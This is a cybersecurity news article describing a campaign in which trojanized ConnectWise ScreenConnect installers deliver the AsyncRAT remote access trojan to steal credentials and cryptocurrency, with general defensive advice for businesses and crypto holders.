Cybersecurity researchers have discovered that attackers are misusing ConnectWise ScreenConnect, a widely used remote access tool, to deliver AsyncRAT, a dangerous Remote Access Trojan. The malicious campaign is designed to steal sensitive data, login credentials, and even cryptocurrency from unsuspecting victims.
The attack begins when a victim downloads or installs a tampered version of the ScreenConnect installer. At first, the file appears to be legitimate because it mimics the real software, and in some cases, attackers even exploit code-signing methods to make it look authentic. Once executed, the installer secretly connects to attacker-controlled servers.
From there, the compromised ScreenConnect installer drops hidden scripts onto the victim’s computer. These scripts use PowerShell or similar techniques to load AsyncRAT directly into memory, without leaving behind obvious files. This fileless approach allows the malware to stay hidden from traditional antivirus tools, making it very difficult to detect.
Once installed, AsyncRAT gives hackers full control over the infected system. It can record keystrokes, steal saved browser passwords, capture screenshots, and monitor clipboard activity. This means that not only are online accounts at risk, but even copied crypto wallet addresses or recovery keys can be stolen and used for theft.
Security experts warn that the attack is particularly dangerous for individuals who manage cryptocurrency on their devices. Some campaigns have been seen deploying information stealers alongside AsyncRAT to specifically search for wallet files, seed phrases, and crypto-related data. This makes financial theft a major part of the attackers’ motive.
Several research teams have analyzed this threat in detail. Acronis Threat Research Unit reported that trojanized ScreenConnect installers were being used to drop multiple RATs, including AsyncRAT. Analysts from LevelBlue Labs highlighted that the malware runs directly in memory, while reports from The Hacker News confirmed that some attackers are targeting cryptocurrency wallets as well.
By abusing ScreenConnect, which is normally a trusted tool used by IT teams, attackers gain a powerful disguise for their activities. Many victims may not realize that anything is wrong because they believe they are installing legitimate software. This use of trusted platforms for malicious purposes makes the campaign even more convincing.
The overall risk is serious, as this campaign combines social engineering, stealthy fileless malware, and financial theft. Both businesses and individual users are at risk if they unknowingly install one of these trojanized installers. The attack also shows how cybercriminals are constantly evolving, finding ways to hide behind trusted technologies.
Experts advise downloading remote access tools only from official sources and keeping them updated to the latest version. ConnectWise has already issued security patches for known vulnerabilities, and applying them quickly is critical. Users should also enable multi-factor authentication, monitor for unusual system activity, and use advanced security solutions that can detect fileless threats.
For people who own cryptocurrency, extra caution is needed. Storing assets in hardware wallets, avoiding suspicious downloads, and never keeping recovery phrases on everyday computers can help reduce the risk. Since AsyncRAT has proven effective in stealing both login details and crypto, awareness and preventive steps are the best defense.
This campaign highlights once again how attackers exploit trust to spread powerful malware. By disguising AsyncRAT inside what looks like legitimate software, they gain control over victims’ machines and access to sensitive data. Staying vigilant and following good security practices are essential in reducing the chance of becoming the next target.
Stay alert, and keep your security measures updated!
Source: Follow cybersecurity88 on X and LinkedIn for the latest cybersecurity news
